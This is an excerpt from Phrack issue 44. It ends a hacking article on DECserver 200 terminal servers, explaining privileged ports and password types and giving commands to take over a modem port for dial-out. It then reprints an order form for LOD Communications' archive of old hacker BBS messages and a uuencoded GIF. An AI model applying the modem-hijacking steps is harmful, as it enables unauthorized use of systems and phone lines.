Local Mode Current Session: None ** Before proceeding lets have a better look at some Features DECserver 200 has, needed to understand some interesting things which follow or even some things that were previously mentioned. Remote Console Facility (RCF) is a management tool which helps you to connect remotely to any server available via it's management port. This is not hardware, but a logical port although it still has the same characteristics physical ports have. There are Privileged, non-Privileged and Secured ports. These are variables you can define by the time you manage to get the privileged account. A privileged port accepts all server commands. You can perform tests, define server operations, maintain security and all that bullshit. If you don't understand it yet, this status is enabled with the SET PRIVILEGED command we have used previously. A non-Privileged port can only manage and use commands which affect the sessions that are currently connected to a host or node. This is the default status of course. A Secured port is something in between. Users can make use of a restricted command set to make changes which affect only the port they own ("Property is theft but theft is property too, Prounton." Pardon me if the translation was destructive to the original meaning of this phrase, and if I piss you off every time I start talking about things that are completely irrelevant to the grand scheme of things and everything my articles are SUPPOSED to deal with). Our little unit has 5 types of passwords and that will help you understand how important it is for the whole system. (1) A PRIVILEGED password is what you should be aware of by now. You can SET/DEFINE SERVER PRIVILEGED PASSWORD "string", to change it. (2) A LOGIN password prevents the use of the server by unauthorized users. This can be enabled for every port or for a single dial-in modem port. You must first specify the password for the entire server via SET/DEFINE SERVER LOGIN PASSWORD and then, enable or disable it depending on the needs of a specified port, via SET/DEFINE PORT x LOGIN PASSWORD ENABLED/DISABLED. This password takes effect when you try to login to a port. The prompt is a "#" sign, without the double quotes. (3) A MAINTENANCE password prevents unauthorized users from doing remote maintenance operations like the one we did after we ran DSVCONFIG.COM. "The DECnet service password corresponds to the server maintenance password and it is entirely unrelated with the DECserver 200 service password". In other words someone who wishes to modify a value in your server must give in the NCP> command line, a parameter which specifies your server's maintenance password. Of course if this password is set to null (0) no password is needed. Also "Digital Equipment Corporation recommends against storing the password in the DECnet database (as the DECnet service password) and it strongly suggests that you change the maintenance password from the default value of 0 to maintain adequate server security" ...tsk tsk tsk... (4) A SERVICE password protects a service or services defined on the server. You can increase or decrease the number of attempts before the server gives a message, informing that the connect has failed because of an invalid password, via SET/DEFINE SERVER PASSWORD LIMIT. (5) A LOCK password protects your current sessions and port from other unwanted human substances. The server accepts no input until you retype the password you used for locking it. Finally, a port may be available only for certain users or groups. ** As you can see, it can be really tough to break VMS' security if all the available measures are taken. Research for modems: Local> show port 8 Port 8: Server: IRIS Character Size: 8 Input Speed: 19200 Flow Control: XON Output Speed: 19200 Parity: None Modem Control: Disabled Access: Local Local Switch: None Backwards Switch: None Name: PORT_8 Break: Local Session Limit: 4 Forwards Switch: None Type: Soft Preferred Service: None Authorized Groups: 0 (Current) Groups: 0 Enabled Characteristics: Autobaud, Autoprompt, Broadcast, Input Flow Control, Loss Notification, Message Codes, Output Flow Control, Verification Simple configuration, probably nothing or a terminal in there. What this screen says is that we have on server IRIS, on port 8, something with character size of 8, flow control XON (it could be CTS -hardware-), parity none, input speed 19200bps, output speed 19200bps and modem control disabled. All the other information have to do with the server and how it reacts to certain things. So if the preferred service was "VMS" and you were logging in through port 8, you would immediately connect to the VAX without having the server asking you where to log you to. The "break: Local" variable means that if you send a break character you will find yourself in the "Local>" prompt even if you have been working in the UNIX OS of the "UNIX" host and that lets you start multiple sessions. Quite useful. The forward and backward switches are for moving around your sessions. Everything can be modified. For more information concerning the parameters have a look at the command reference or the help utility. Local> show port 1 Port 1: Server: IRIS Character Size: 8 Primary Speed: 9600 Flow Control: CTS Alternate Speed: 2400 Parity: None Modem Control: Enabled Access: Dynamic Local Switch: None Backwards Switch: None Name: MODEM_1 Break: Local Session Limit: 4 Forwards Switch: None Type: Soft Preferred Service: VMS Authorized Groups: 0 (Current) Groups: 0 Enabled Characteristics: Autobaud, Autoconnect, Autoprompt, Broadcast, Dialup, DTRwait, Inactivity Logout, Input Flow Control, Loss Notification, Message Codes, Output Flow Control, Ring, Security, Verification And that's, obviously, a modem. The speed, the modem control and the enabled characteristics will help you understand even if the name is not helping at all. Have a look at the "Alternative Speed" option. What to do now that you have find it? Local> set port 1 modem control disabled Local> set service modem port 1 Local> connect modem Start programming. This way is a little bit awkward and of course there is a possibility that the modem is ALREADY defined as a dial-out modem. You are a privileged user, don't forget that. I would recommend not to harm the server ("nothing comes from violence and nothing ever good") and to leave things as u find them. DO NOT create a permanent dial-out modem service (which can be done directly from VMS if you really want to) and DO NOT forget that somebody has to pay for your calls and that the line which the modem uses, may be limited to certain numbers or even prevent out-dialing by hardware. Use your brains...And don't stick in the idea of researching modems. You can use a DECserver to infiltrate a system. Don't misuse those introductions. Overview of Commands (in alphabetical order) * BACKWARDS Goes back to a previous session. * BROADCAST Sends a message to a port. * CLEAR Clears a service. It belongs to the Operational Database. * CONNECT Connects to a service or port. * CRASH Shuts down the server and reinitializes it. * DEFINE Defines something. It belongs to the Permanent Database. * DISCONNECT Disconnects a session or port. * FORWARD Goes forward to a following session. * HELP Help. * INITIALIZE Reboots the server. You can specify a delay in minutes and "Local>initialize cancel" if you decide, finally, not to do it. * LIST Displays information on something; Devices,Nodes,Ports,Queue, Server, Services, Sessions... * LOCK Locks your terminal with a password you specify that moment. Retype your temporary password to continue. * LOGOUT Logs out the specified port. If none, your current port. * MONITOR Devices, Nodes, Ports, Queue, Server, Services, Sessions... * PURGE Purges a service from the Permanent database. * RESUME Resumes a session. * SET Devices, Nodes, Ports, Queue, Server, Services, Sessions, Characteristics,Privileged,NONprivileged...It belongs to the Operational database. * SHOW Everything. * TEST Tests a LOOP, PORT or SERVICE. An interesting Warning Message, just for informational purposes, is the following; " Local -120- WARNING - Access to service is not secure Session status information cannot be passed between the server and the attached device because modem signals are not present. This is not a problem if the device is a non-secure printer; however, if the port is a non-LAT host system, users could access other users' data. " That's all for now I think. There are many things to explain but there is no reason for doing that right now. If you need more information then just have a look at the HELP utility or contact me, somehow. [I hope you have not misunderstood my strange looking article because my native language is not English] " Opticon: Don't you think that I'm getting insane? TLA: Yeah, sure looks like it..." Love and An-archy to all those who know why. BREAK DOWN THE WALL ==Phrack Magazine== Volume Four, Issue Forty-Four, File 23 of 27 **************************************************************************** The LOD Communications Underground H/P BBS Message Base Project: Information and Order Form File Version #2, 7/30/93 This file contains: - Background information on the project; - Excerpts from Computer underground Digest (CuD) Issue #5.39; - UPDATED FAQ AND PRICING; and, - UPDATED Order form and stipulations. This is an update of Version #1 of this file. A change in pricing structure (to your benefit) has been made along with some additions to the FAQ among other things. All sections that have been changed/updated are bordered by 3 asterisks (*** ___ ***). Please take the time to read through the updates. Sections without asterisks have not been changed and are essentially the same as in Version #1. This file is approximately ten pages in length (28K) and should answer all of your questions. The Project: ------------ Throughout history, physical objects have been preserved for posterity for the benefit of the next generation of humans. Cyberspace, however, isn't very physical; data contained on floppy diskettes has a finite lifetime as does the technology to retrieve that data. The earliest underground hacker bulletin board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s were state-of-the-art. Today, it is difficult to find anyone who has one of these machines in operating condition, not to mention the brain cells left to recall how to operate them. :-( LOD Communications has created a historical library of the "dark" portion of Cyberspace. The project's goal is to acquire as much information as possible from underground Hack/Phreak (H/P) bulletin boards that were in operation during a decade long period, dating from the beginnings (in 1980/81 with 8BBS and MOM: Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90. Currently, messages from over 50 different BBSes have been retrieved, although very few message bases are 100% complete. However, not having a complete "set" does not diminish their value. Who Benefits From This Information?: ------------------------------------ - PARTICIPANTS who were on the various H/P BBSes may want to see their contribution to history or reminisce about the "golden era" of hacking; - ENTHUSIASTS who came into the "scene" after most of these boards were down may want to see what they missed; - COMPANIES who may want to see if their (or their competitors') phone systems, computers, or networks were compromised; - SECURITY PROFESSIONALS/LAW ENFORCEMENT who may want to see what techniques were used to subvert computer security systems; - SCHOOLS AND UNIVERSITIES (including their libraries) who may want to use the information for research in sociology or computer science as well as for educational purposes in courses such as Computer Law, Computer Ethics, and Computer Security; - AUTHORS/PRESS who may want to finally get the facts straight about "hackers"; and, - THE CURIOUS PUBLIC who may want to sneak a peek into the inner realm of the Computer Underground, especially those Restricted Access BBSes and their Private sub-boards where only a small handful of "the best" resided. Were the individuals involved in the Computer Underground out to start World War III, selling secrets to the Soviets, working with organized crime, conspiring to do evil, or just a bunch of bored teenagers with nothing better to do? How much did they know, and how did they find it out? Did they have the capability to shut down phone service of Area Code portions? Could they ruin someone's credit? Could they "move satellites in the heavens?" Could they monitor packet switching network conversations or YOUR conversations? The answers lie within the messages themselves. *** Why is LODCOM Charging Money For The Message Bases?: *** ------------------------------------------------------------ As happens with most projects, the effort and monetary investment turned out to be substantially more than originally anticipated. With all of the high-tech equipment available today, people sometimes forget that in the early 1980s, 14.4K baud modems and 250 MB hard drives were just a fantasy for the home computer user. Most messages Lodcom has recovered were downloaded at 300 baud onto 143K disk drives, with each file usually no larger than 15K in size. One could not call a BBS and download the complete message base in 10 minutes and save it into one file. Literally hundreds of man-hours have been spent copying dusty Apple ][ disks, transferring them to IBM (or typing in hard copy versions when electronic versions were unavailable), organizing over one thousand individual files (thus far) according to what BBS the messages were originally posted on, and splicing the files together. Also, after consulting with the appropriate civil liberties organizations and our own legal counsel, a slight editing of the messages (restricted to long distance access codes, phone numbers, and computer passwords) had to be made to ensure that there is nothing illegal contained within the messages. Every effort was made to keep the messages in their pristine condition: 40 columns, ALL CAPS, spelling errors, offensive language, inaccuracies of various kinds, and ALL. Although a fairly comprehensive collection of the goings-on during a decade of public and private computer underground activity has been accomplished, there are more messages out there. It is our wish to continue to document the History of the Computer Underground. In order to do this, and in order to break even on what resources have already been expended (it is a LOT more than most people realize), a dollar value has been attached to the entire compilation of message bases (ie, all Volumes combined). Without your understanding and support, this effort may not be able to sustain itself long enough to complete the project. A large portion of any profits will be recycled for two other projects in the works, whose aim is to provide additional historical background on the Computer Underground Community. That is, no one involved is quitting their day job :-) DONATIONS: A portion of every order will be donated to the following causes: 1) A donation will be made to help pay for Craig Neidorf's (Knight Lightning - Metal Shop Private Co-Sysop) Legal Defense bills (resulting from his successful campaign to protect First Amendment rights for electronic publishing, i.e. the PHRACK/E911 case). 2) The SotMESC Scholarship Fund. The SotMESC Scholarship is awarded to students writing exceptional papers of 20 to 30 pages on a topic based on computer culture (ie, hacking culture, virus writing culture, Internet culture, etc.) For more details write: SotMESC PO BOX 573 Long Beach, MS 39560 or email: rejones@seabass.st.usm.edu What Each "Message Base File" Contains: --------------------------------------- - A two page general message explaining H/P BBS terminology and format. - The BBS Pro-Phile: A historical background and description of the BBS either written by the original system operator(s) or those who actually called the BBS when it was in operation (it took months to track the appropriate people down and get them to write these specifically for this project; lesser known BBSes may not contain a Pro-Phile); - Messages posted to the BBS (i.e. the Message Base); - Downloaded Userlists if available; and - Hacking tutorials a.k.a. "G-Philes" that were on-line if available. It is anticipated that most people who are interested in the message bases have never heard of a lot of the BBS names shown in the listing. If you have seen one set of messages, you have NOT seen them ALL. Each system had a unique personality, set of users, and each has something different to offer. Formats the Message Base Files are Available in: ------------------------------------------------ Due to the large size of the Message Base Files, they will be compressed using the format of your choice. Please note that Lodcom does NOT include the compression/uncompression program (PKZIP, PAK, etc.). ASCII (uncompressed) files will be provided for $5.00 extra to cover additional diskette (files that are uncompressed require more than double the number of diskettes) and shipping costs. The files are available for: - IBM (5.25 or 3.5 inch) - AMIGA (3.5 inch) - APPLE MACINTOSH (3.5 inch) - PAPER versions can be ordered but cost triple (due to increased shipping costs, time to print order, and messages being in 40 column format and therefore wasting lots of paper...save those trees!). Paper versions take twice the time to deliver but are laser printed. Orders are expected to arrive at the requesters' physical mail box in 3-5 weeks upon receipt of the order. *** FAQs (Frequently Asked Questions): *** ------------------------------------------ QUESTION: In VERSION #1 of this file a minimum order size of $20.00 was required but I don't see that in this version. Also all the individual Message Bases had a price. Why the change? ANSWER: After disseminating the first version of this information file, we received a very good response as far as orders are concerned. Since our goal is to recoup the expenses incurred (and still incurring) on this project rather than 'fleece the masses' it was decided to lower the overall price which translates to offering more files for the same old price. That is, you will receive ALL Volumes of this project for $39.00 rather than just the 1st Volume as was mentioned in the last release of this information file. As for the minimum order ($20.00), since EVERYONE who has thus far ordered the Message Bases ordered the complete volume (was Volume #1 only, now it's all volumes) rather than individual message bases, we decided to do away with individual Message Base pricing due to lack of demand. QUESTION: How many Volumes will Lodcom be releasing? ANSWER: Three Volumes minimum, possibly a fourth if additional material is obtained. There are still a few contributors who have material that hasn't been sent to us yet. The expected release of future Volumes are: Volume 1: 5700+ Messages, 20 H/P BBSes, COMPLETED. Volume 2: 15-25 H/P BBSes, September 1993. Volume 3: 15-25 H/P BBSes, November 1993. Volume 4: If there is one, End of December 1993. All in all there is expected to be 15000+ Messages. QUESTION: How long will these Message Base Files be available? ANSWER: We cannot say for sure. This is an ongoing effort and your support will allow us to continue until we are satisfied with having recovered the last decent scraps of messages out there. Assuming there is a demand for these messages, all H/P BBSes of WORTH (i.e. NON-"codez" and NON-"warez" systems) are expected to be offered by the end of this year (1993). A Guesstimate of what will be offered is 60 to 80 Message Bases, half of which will be rather partial. Orders are expected to be filled at least into the beginning of next year (1994) although this may change. Regardless, we will send out notification well in advance of ceasing operations. QUESTION: I ordered Volume #1 already, is your new pricing retroactive? ANSWER: Yes. If you have already ordered Volume #1, when the next Volume is completed it will be sent out to you without any action on your part. If you change mailing addresses be sure to notify us. Think of this as a Subscription of sorts. Order now and all completed Volumes will be sent to you. When another Volume is finished it will be sent out automatically. If it wasn't for all of you who have already ordered and showed your support, we would not be able to offer ALL the Volumes for what you paid for the first Volume. QUESTION: What if lodcom obtains more messages from a BBS or BBSes after a Volume has been shipped to me, will I get those messages also? ANSWER: Yes. Any additional messages to a H/P BBS that we obtain after shipping that BBS file to you will be sent to you either via email or via snail mail on another diskette. QUESTION: I would really like to get a feel for what a few of the boards were like before I order them. Can I get more info? ANSWER: Yes. A Sample of actual messages is available by performing the following, so long as you have TELNET access to the Internet: Telnet to: phantom.com (or) 198.67.3.2 Type: mindvox [To enter the Mindvox system] login as: guest [To look around] At prompt: finger lodcom [To see our Sample Messages File] If you do not have TELNET access to the Internet, AND your host will NOT "bounce" a 50K file, Lodcom will send you the Sample Messages File if you specifically request it. The file has 31 fairly typical messages from Five H/P BBSes that operated between 1983 and 1989. QUESTION: "Can I help out? I have some old messages" (either on a C64, Apple, IBM [best for us], or printout). ANSWER: Contact us ASAP! We will work out an equitable agreement depending on the quantity, quality, format, and "ancientness" of the messages. Your contribution will not go unrecognized. QUESTION: I would like another person's point of view on this project before I decide to order. Where can I get more information? ANSWER: See the following excerpt from Cud #5.39. We also list where you can get the original CuD issue which also includes an interview and some BBS Pro-philes. *** CuD Excerpts: *** --------------------- Computer underground Digest Sun May 30 1993 Volume 5 : Issue 39 ISSN 1004-042X Editors: Jim Thomas and Gordon Meyer (TK0JUT2@NIU.BITNET) CONTENTS, #5.39 (May 30 1993) File 1--The LOD Files - A CuD Critique File 2--Histories of BBSes (excerpts from the LOD files) File 3--LOD Project Summary and Contact Information File 4--An Interview with the LOD Cu-Digest is a weekly electronic journal/newsletter. Issues of CuD can be found in the Usenet comp.society.cu-digest news group. U.S. Anonymous FTP: ftp.eff.org (192.88.144.4) in /pub/cud directory. Back issues may be obtained through mailserver at: server@blackwlf.mese.com *** {The following excerpts are from CuD #5.39 File 1, CuD's Critique} *** "...Lest there be any confusion, there remains only one LOD, most of its original members are in periodic contact, they have long since become adults, and there is no relationship between the original LOD and any recent individuals or groups claiming the name. But who really cares?? CuD, for one cares. The original LOD remains a cultural icon of the 1980s in computer culture, and--for better or worse--it was the most influential and imitated group whose mystique continues into the mid-90s. This alone is hardly sufficient reason to worry about a label. The identity is important because the original members are becoming involved in projects that reflects their activities of a decade ago, and it becomes confusing when others scurry about trying to associate with that identity. If questions of identity arise, confusion over and doubts about the credibility of the projects arise. One current LOD project has impressed us. The original LOD members are compiling logs from a number of the premier "hacker underground BBSes" of the 1980s. We have obtained excerpts from the project, and we are impressed with the professionalism and comprehensiveness of the material. Working collectively under the name "LOD Communications," former members have scoured their archive for BBS logs from the mid-to-late 1980s. The logs include BBSes such as OSUNY, Twilight Zone, Forgotten Realm, Black Ice Private, Phoenix Project, Face to Face, Alliance, and Plover-NET, among others. Many were the primary boards of the era, and others typify secondary levels of the culture. Both singly and in the aggregate, the collection provides an unprecedented view into a culture that most of us only read about in "Cyberpunk" or "The Hacker Crackdown." We like the material for several reasons. First, as researchers, we find even the limited material we have seen to date as a rich source of data for anybody who wants to understand the culture of time. It is as if somebody had walked though San Francisco's Haight-Ashbury district with a video-cam during the "Summer of Love" and then released the tapes years later. It's an anthropologists dream, a sociologists data trove, and a historian's archival orgasm. Even law enforcement and security personnel would find it helpful for demystifying many of the misconceptions of "hackers." For others, it's simply fun reading. The logs are sufficiently entertaining and useful when each board is read individually. However, the power of the collection comes in reading them as chapters in a novel, as segments at different points in time that combine to give the individual posters and the boards a personality. We find ourselves wanting to know more about some of these people: How did they resolve their problems? Who was the alleged informant on a given board? Can we spot them from the posts? How did that poster resolve his problems? What happened to these people later? Many of the logs' posts are flattering, others are less so. To their credit, the lodcom editors have left it all intact to let the readers see and judge for themselves what occurred on the underground boards. The LOD collection provides an authentic look into what went on, and reading them gave us a feeling of deja vous all over again." *** {End CuD #5.39 Excerpts} *** VOLUME #1 CONTENTS: ------------------- LOD Communications (c) 1993: VOLUME #1 List of Hack/Phreak BBS Message Bases ---------------------------------------------------------------------------- BBS NAME A/C SYSOP(S) # MSGS DATES KBYTES PROPHILE ---------------------------------------------------------------------------- Alliance BBS 618 Phantom Phreaker 113 2/09/86 - 215 YES Doom Prophet G,P 6/30/86 Black Ice Private 703 The Highwayman 880 12/1/88 - 560 YES P,U 5/13/89 Broadway Show/ 718 Broadway Hacker 180 9/29/85 - 99 YES Radio Station BBS 12/27/85 CIA BBS 201 CIA Director 30 5/02/84 - 30 NO 6/08/84 C.O.P.S. 305 Mr. Byte-Zap 227 11/5/83 - 196 YES The Mechanic G,R,U 7/16/84 Face To Face 713 Montressor 572 11/26/90 - 400 YES Doc Holiday 12/26/90 Farmers Of Doom 303 Mark Tabas 41 2/20/85 - 124 YES G 3/01/85 Forgotten Realm 618 Crimson Death 166 3/08/88 - 163 NO 4/24/88 Legion Of Doom! 305 Lex Luthor 194 3/19/84 - 283 YES Paul Muad'Dib * G,P,U 11/24/84 Metal Shop Private 314 Taran King 520 4/03/86 - 380 YES Knight Lightning P,R,U 5/06/87 OSUNY 914 Tom Tone 375 7/9/82 - 368 YES Milo Phonbil * G,U 4/9/83 Phoenix Project 512 The Mentor 1118 7/13/88 - 590 YES Erik Bloodaxe * G,R 2/07/90 Plover-NET 516 Quasi Moto 346 1/14/84 - 311 YES Lex Luthor * G 5/04/84 Safehouse 612 Apple Bandit 269 9/15/83 - 251 YES G,U 5/17/84 Sherwood Forest I 212 Magnetic Surfer 92 5/01/84 - 85 YES P,U 5/30/84 Sherwood Forest ][ 914 Creative Cracker 100 4/06/84 - 200 YES Bioc Agent 003 * G 7/02/84 Split Infinity 408 Blue Adept 52 12/21/83 - 36 YES 1/21/84 Twilight Phone ??? System Lord 17 9/21/82 - 24 NO 1/09/83 Twilight Zone/ 203 The Marauder 108 2/06/85 - 186 YES Septic Tank Safe Cracker * G,U 7/24/86 WOPR 617 Terminal Man 307 5/15/84 - 266 YES The Minute Man * G,U 1/12/85 _____________________________________________________________________________ NOTES: In SYSOP(S) column, * indicates remote sysop. In #msgs column, P indicates that the BBS was Private, R indicates BBS was public but restricted access sub-board(s) are included, G indicates that SOME (or maybe all) of the G-files written by the sysop and/or files that were available on the BBS are included, U indicates that a BBS Userlist (typically undated) is included. DATES column shows the starting and ending dates for which messages were buffered (and therefore available) although there may be some gaps in the chronological order. KBYTES column shows size of complete file containing messages, g-files, userlist, etc. PROPHILE column indicates if a "BBS Pro-Phile" was written and is included. LODCOM is currently organizing and splicing messages from over 30 more H/P BBSes [shown below] and, as the files are completed and/or as additional messages are procured for the above systems, updates of this listing will be released. Modem Over Manhattan (MOM), 8BBS (213), Mines of Moria (713), Pirates Cove (516) sysop: BlackBeard, Catch-22 (617) sysop: Silver Spy, Phreak Klass 2600 (806) sysop: The Egyptian Lover, Blottoland (216) sysop:King Blotto, Osuny 2 (a.k.a. The Crystal Palace) (914), Split Infinity (408), The Hearing Aid, Shadowland (303) sysop: The ShadowMaster, ShadowSpawn (219) sysop: Psychic Warlord, IROC (817) sysop: The Silver Sabre, FreeWorld II (301) sysop: Major Havoc, Planet Earth (714), Ripco (312) sysop: Dr. Ripco, Hackers Heaven (217) sysop: Jedi Warrior, Demon Roach Underground (806) sysop: Swamp Ratte, Stronghold East Elite (516) sysop: Slave Driver, Pure Nihilism, 5th Amendment (713) sysop: Micron, Newsweek Elite (617) sysop: Micro Man, Lunatic Labs (415) sysop: The Mad Alchemist, Laser Beam (314), Hackers Den (718) sysop: Red Knight, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca Bandit, The Armoury (201) sysop: The Mace, Digital Logic's Data Center (305) sysop: Digital Logic, Asgard (201), The KGB, PBS (702), Lost City of Atlantis sysop: The Lineman, and more. *** Hacking/Phreaking Tutorials a.k.a. "G-Philes": *** ------------------------------------------------------ Along with the above H/P BBS Message Bases, LODCOM has collected many of the old "philes" that were written and disseminated over the years. A list of all of them would take up too much space here, however, we can tell you that the majority are NOT files that were originally written for electronic newsletters such as Phrack, PHUN, ATI, etc. (with the perhaps obvious exception of the LOD/H Technical Journal). Those files/newsletters are readily available from other sources. This hodgepodge includes files that somehow fell out of widespread circulation. A Table of Contents of the collection is included but the tutorials are all grouped together in four large files of approximately 250K each. UPDATE/ADDITION: A collection of material is being compiled from the H/P BBS Message Bases and Files along with other sources that is an organized conglomeration of all the writings of all the ex-members of the Legion of Doom/Hackers group. It also includes private LOD/H Group sub-board message bases that resided on the LOD BBS (1984), Catch-22 (1985), Phoenix Project (1988), and Black Ice Private (1988) that were NOT included in those BBSes' Message Bases. BBS Messages from before and after each member entered the group along with any files they wrote will be organized, by member name, into individual files. This is being done more for ourselves than anything else as we are curious how much material was created over the years. Note that this special collection of files will be sent to you around the same time that Volume III is sent out and is free for ordering BOTH, the G-Phile Collection mentioned above, and the Message Base Files. *** The Order Form: *** ----------------------- - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - - LOD Communications H/P BBS Message Base ORDER FORM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PERSONAL RATE: Volumes 1, 2, 3, and possibly a fourth if created: $39.00 This price is total & includes any updates to individual BBS Message Bases. COMMERCIAL RATE: Corporations, Universities, Libraries, and Government Agencies: $99.00 As above, price is total and includes updates. H/P BBS Message Bases (All Volumes): $________ "G-Phile" Collection (Optional): $____________ ($10.00 Personal) ($25.00 Commercial) Disk Format/Type of Computer: _____________________________________ (Please be sure to specify diskette size [5.25" or 3.5"] and high/low density) File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________ (ASCII [Non-Compressed] add $5.00 to order) Texas Residents add 8% Sales Tax. If outside North America please add $6.00 for Shipping & Handling. Total Amount (In U.S. Dollars): $ ___________ Payment Method: Check or Money Order please. Absolutely NO Credit Cards, even if it's yours :-) By purchasing these works, the Purchaser agrees to abide by all applicable U.S. Copyright Laws to not distribute or reproduce, electronically or otherwise, in part or in whole, any part of the Work(s) without express written permission from LOD Communications. Send To: Name: _____________________________________ Organization: _____________________________________ (If applicable) Street: _____________________________________ City/State/Zip: _____________________________________ Country: _____________________________________ E-mail address: _____________________________________ (If applicable) PRIVACY NOTICE: The information provided to LOD Communications is used for sending orders and periodic updates to the H/P BBS Message Base Price List. It will NOT be given or sold to any other party. Period. - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - - Remit To: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 Lodcom can also be contacted via E-mail: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 _____________________________________________________________________________ End Order File V.2 LOD Communications: Leaders in Engineering, Social and Otherwise ;) Email: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 Snail Mail: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 ==Phrack Magazine== Volume Four, Issue Forty-Four, File 24 of 27 **************************************************************************** COURTESY OF THE UNITED STATES SECRET SERVICE THE MASTERS OF DECEPTION "MOD" CIRCA NOVEMBER 1990 GIF87A FORMAT, GREYSCALE begin 644 mod.gif M1TE&.#=AD &0 ?< ,8 #& ,;& QL8 Q@#&QL?'Q\?FQZK2_/O[ M^^GIZ=C8V,7%Q;.SLZ&AH8^/CWQ\?&IJ:EE964='1S0T-"(B(A 0$ M@ " @ " (" ( ( @/S__SB @(#_ #@X /S2JO^ *BCHX X ( _X M. X@ M M M M M M M M M M M M M /___*.CJ(" @/\ #_ M /__ __\ _P#______RP D &0 0 (_P Q"!PX\,(%@@@3*ES(L"%# M"Q C2I18@8*$" \>.( P88($"1,J0*Q0D8)(@R@O3(28LJ4%A2T-.IQ)LV9# ME!)CZEQI<*4%G4"#!K594ZC1HT8=(EV*DB& IU !+/QYD*C5JRY]^J2 4:.# M!@\B7 0ILD+'CA2HIO09]&5"H5?C6HV9\RA/E7>9ZHTI=Z_?OX"7.HWZ]&U* MN8@++M4ZLB)&!U\;-(#\@*/)BF?3[JR[-R)0SX!!L\RJ%B=GTUI[,A8=D61I MI* #RYY-NS;>8;E9T$%$K#'P&3#";=1?";1YY^'W"FX M7W3\*C:GZ!>.5?-))WXWD$VC>163\V$&2&#F04 M69K&E43!FS#2UJ2<<8[8XHY1XMD:E?S5F9Z?T\VYY5Y=-O@E0C+-))M^/I$T MP6-F"@E9FAEY%99\;\(YZ*9.^F8?BBH)R*=W5I+8(J>H'I50C0[NMM"6C*[_ M]*8$$#P0Z9F35E8K96(=!VBJ?RX8Z(X\IHCJQB5A:7N^ MB=&M04JJ:Z5&RK0VZZYRAPW$ZH-8_4GM2!1T M1*M[Q W);7RN]2?HD^,63)NYPS:7KJCMPOONPP8G*A"K,+I5;VW2C4E2OAX% M-^G'[CG0*WY:\KC=P [[5AO"YY:J[K'!0BQSEJ411+&K%]/)HUF9Y7L1!$"# M+%R0#[1),K/1N=PNR@0?+-2):S$<\\Q4PU:SO- .A5C#(TZ)6<\^1R!VI1^; MN5%:&:]&W!(YVLR\?>G??F+\;+MZ%:(P8XQJUE6OCI'9,M69 . M')FPVO=-2^QT@=+.'7;7!3PY=)SW?N#>&,Q;%8X#4;XSQZBC%78$NQ+WP 3W M/JZYYK?/'J["=3Y>G^[U3>[[]^QZ'CRTQ!/$+KX>?012X6\:WE7B$&AFHG5- MP[H[RB5[+6KF>PX8+O@ G$UW;$:^\LWM18[2E_IZ)J#V'8Y;QED1["2WJ;A9 M;EA&01_J/B*?8ZWK?P$,(,@\"8E&?#/]?$[<1LDB$P-(/UD!GP/RD<'V941%+7L:S!7:D M<7>"6I64=B]T1D8BJ 2XQ*AB 2!-MR)S!H:Y# M2$N@X4(BP2]V*E8ELU?=&F41L8QM2$)+D]A"TL).I8J+;!37\-X(E3C.D8Z+ ML:/R?(6TQF &)/++8O[2:#+C]6F0*ZD(K8"V*THE,B-F9!;U](;)2&Y18I0L MC,4@)"(]8JI#-AQ39M9F2@I6\%ZD424K:T4V?Y%1;$>:83%MB;="P1%,]MN? M_^:G/V(J:9I6LYUIJFA('_[(F64$(MH<2"C_MEH!S2N3FDQE '8T=QH4+PRZ)F]\1T_.C"XSI2D ;9K02HJT:GF17@X#>5(!3E.?'6NE4-=W MD6;FJC)H(>* [JE49S6U,$^E6E2ERA@,JC%P&,,,,[\*1/>U,E=BZ:!8J436 MLJ;JI@I-C%7/)4BV&C8K23ME=MQ:+/]D9V-G5":_( .T'G[D?6.$)C"CEE2_ M@@^P3LUIYQA+.L.:%K'.N=SN2 LJ/0&G5Y97RX5$Y"U'/ M7@FT:!6MRFY7H@_QE*W=LR>67J>GDGZQK:%Z5*V"V+ZQWD5I>M"W%K M5ZSC;DQ3VMF3AG>Y>$$P>:-ES= *5D)TN]\?3_NA)YG6O<:]\&HO<-\@RN=1 M ,76F01:JTB)#)IA1*,$21C=-;S/AC"+0.0J2Z<7 MKN)X_ M;FZ .L:\14HWQ Q8@)*5G"$U9=2V>E6Q212G&::ARA3HH)O*0D MKC&I^M>0WGBT\C5I,,D&R2 M%FLG2A@G^-16:QNCJ=;EP/8E9E@^;&I3[<G%P2AB*C7:@>_.GRH3C-T24WK4=MZPPK.-2I) MMK'T=35QB21.1LD(TV-_*-G>#C.W4PO?>DLSL6N,Z(*J'=QW*NIW84;NM\5, M3:SJB]T:*>JZ$8[G_N%+V>/N+<3ZJJ#/7;,E'#O6V]@U(\/+FT$8-A4MKE!CG:I:YUJJOZ2#=9I)EJ\BK(PF+9 M[H(''Q:;D9L]KBE:07S>F4QIM33^ U1"T^O^:1,;I2Z!_3E;'Y:'"T M)?U3QF2ZJ%5=M9B?T-^*&2QSK;Y%]G:\WMT+-]YQ#>Z4FCL"Z"1Y(HD-Y19^ MS>PJ;[E/1RIQ&;E=ZH@"\\8CK5CC#GR\>DH8E;&\V)9\\K*1\3K8\8KR'@V3 M9Z'&>;9UVG@:0SVX<9]1A"(V]T=[W,RJW[F5ESWI"W^^JR87/,DS&\28AC&" M.R0[,<7L] 5SZ?4VCCW&IT[[1-M>T;A_>>?M_:UM:_CX7?W*_T9V!?1T0K.[ M!CE^6L)X1EWC3MHQ=CZAH$]]N+]]R]>+S9JWG6KN675V5B<]_(,3RR,6K?1/ MPR=^XE=9>>4MZ4!35%_=W=]CA-DP21% M:%=*/F:")_A!H:*"%\$O%\)?_84FE1%!OU&#+8=U%CAOM-1V.QAYLN>%GL)] M._5])#&$_*-X/<9-2/@;2HA5/ 